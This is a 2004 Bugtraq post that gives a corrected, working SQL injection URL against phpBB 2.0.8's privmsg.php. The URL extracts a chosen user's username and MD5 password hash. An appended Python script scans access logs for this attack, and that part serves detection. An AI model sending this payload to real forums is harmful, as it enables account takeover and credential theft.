Bugtraq mailing list archives

phpBB 2.0.8 Exploit
From: JeiAr <security () gulftech org>
Date: 28 Mar 2004 18:59:05 -0000



Hi guys,

After playing around with the private message SQL injection issue on a forum that I admin, I noticed that the exploit code posted in the author's post doesn't work correctly. Here is why:

Both the TO and FROM fields hold the username and md5 hash in his exploit. The problem is that each field is only able to hold 25 bytes at most (at least on the forums I tested it on, they were all 2.0.8). Well, an MD5 hash is 32 bytes, so you may get what looks like a valid hash at first glance, but it doesn't work as it is an incomplete hash. Below is an example that stores the username in the SUBJECT of the PM and the MD5 hash in the BODY of the PM. It was tested on a few versions with working results. Of course the user_id=2 can be replaced with whatever user_id someone wants.

/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*

Hope this helps :)

JeiAr
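For forum administrators looking for this activity in their web server logs, the following is an added detection example (not part of JeiAr's post and not phpBB code). It parses Apache-style access log lines, decodes the query string, and flags two things the post makes observable: a client-supplied pm_sql_user parameter on privmsg.php (assumed here never to be a legitimate browser-sent parameter) and a UNION SELECT fragment in any parameter value. The log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined-style, not real traffic).
# The first line carries a query string shaped like the one in the post,
# URL-encoded as a browser or tool would send it.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Mar/2004:18:59:05 +0000] "GET /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type%3D-99%20UNION%20SELECT%200,0,username%20FROM%20phpbb_users%20WHERE%20user_id%3D2%20LIMIT%201/* HTTP/1.1" 200 5123
10.0.0.6 - - [28/Mar/2004:19:00:10 +0000] "GET /privmsg.php?folder=inbox&mode=read&p=42 HTTP/1.1" 200 4321
10.0.0.7 - - [28/Mar/2004:19:01:00 +0000] "GET /viewtopic.php?t=12 HTTP/1.1" 200 9876
"""

# Extracts the client IP and the request target from a combined-format line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# UNION SELECT / UNION ALL SELECT after the query string has been decoded.
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)


def analyze_request(raw_url):
    """Return a list of reasons a request target looks like the privmsg.php injection.

    An empty list means nothing suspicious was found.
    """
    parts = urlsplit(raw_url)
    # parse_qs percent-decodes values, so %20 / %3D become plain text here.
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []

    # Assumption: pm_sql_user is an internal query fragment and should never
    # arrive from the client on privmsg.php.
    if parts.path.endswith("/privmsg.php") and "pm_sql_user" in params:
        reasons.append("client-supplied pm_sql_user on privmsg.php")

    # Generic check: a UNION SELECT in any parameter value.
    for name, values in params.items():
        if any(UNION_RE.search(v) for v in values):
            reasons.append(f"UNION SELECT in parameter {name}")
    return reasons


def scan_log(text):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, url = m.group(1), m.group(2)
        reasons = analyze_request(url)
        if reasons:
            findings.append({"ip": ip, "url": url, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["url"])
        for r in f["reasons"]:
            print("  -", r)
```

The pm_sql_user check is the higher-fidelity signal for this specific issue, since the parameter name itself should not appear in client requests; the UNION SELECT match is broader and will also catch variants that move the injected fragment into other parameters, at the cost of occasional false positives on legitimate text containing those words.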